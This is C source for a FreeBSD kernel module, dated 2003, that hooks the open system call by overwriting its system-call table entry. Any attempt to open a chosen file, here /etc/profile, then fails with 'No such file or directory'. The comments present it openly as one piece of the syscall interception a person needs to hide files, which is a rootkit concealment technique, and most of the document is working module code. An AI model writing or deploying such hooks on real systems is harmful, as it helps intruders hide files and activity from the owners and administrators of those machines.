/* * -=FreeBSD open_hidefile=- * * just an open syscall replacement * one of the many syscalls you have to catch * if you´re planning to hide files. * * this one catches every open syscall and searches * for a given filename, if it´s found "NOTFOUND" is * returned instead. * * this is _not_ enough to completly hide a file. You still can * see it in various ways, but a 'cat /etc/profile' * for example will return ENOENT. * ...a better way would be to catch the filename via * the underlaying filesystem (ufs) aka via the vnode tables. * * proof: * * develop# cat /etc/profile * cat: /etc/profile: No such file or directory * * develop# cd /etc * develop# more profile * profile: No such file or directory * * but you still can see it with 'ls' * develop# ll /etc/profile * -rw-r--r-- 1 root wheel 623 Aug 14 2002 /etc/profile * * * Copyright (c) 2003, Gino Thomas * All rights reserved. * Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: * Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. * Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation * and/or other materials provided with the distribution. Neither the name of the nux-acid.org nor the names of its contributors may be used to endorse * or promote products derived from this software without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE * LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE * GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH * DAMAGE. * */ #include #include #include #include #include #include #include #include #include #include int file_hidden(char *filename){ char search[]="/etc/profile"; char search2[]="profile"; if(strcmp(filename, search)==NULL){ return 1; }else if(strcmp(filename, search2)==NULL){ return 1; }else{ /* 0=nothing happens, 1= 'not found' aka ENOENT*/ return 0; } } /* args for new syscall */ struct new_open_args{ char *path; int flags; int mode; }; /* the syscall itself */ static int new_open(struct proc *p, struct new_open_args *uap) { char kstr[1024+1]; /* Holds kernel land copy of uap->str */ int err = 0; /* Generic return(err) */ int size = 0; /* copy from userland to kernelland, uap struct holds the userland args */ err = copyinstr(uap->path, kstr, 1024, &size); if (err == EFAULT) return(err); if(file_hidden(kstr))return(ENOENT); printf("The value passed was: %s\n", uap->path); return(open(p,uap)); } /* Args from open and pointer to new syscall */ static struct sysent new_open_sysent = { (sizeof(struct open_args) / sizeof(register_t)), (sy_call_t *)new_open }; /* set the internal ID for the call, NO_SYSCALL means next free one */ static int syscall_num = NO_SYSCALL; /* the load_handler, called by kldload/kldunload and shutdown */ static int load_handler(struct module *m, int what, void *arg) { int err = 0; switch (what) { case MOD_LOAD: sysent[SYS_open]=new_open_sysent; break; case MOD_UNLOAD: sysent[SYS_open].sy_call = (sy_call_t *)open; break; default: err = EINVAL; break; } return(err); } /* syscall macro filled out*/ SYSCALL_MODULE( new_open, &syscall_num, &new_open_sysent, load_handler, NULL);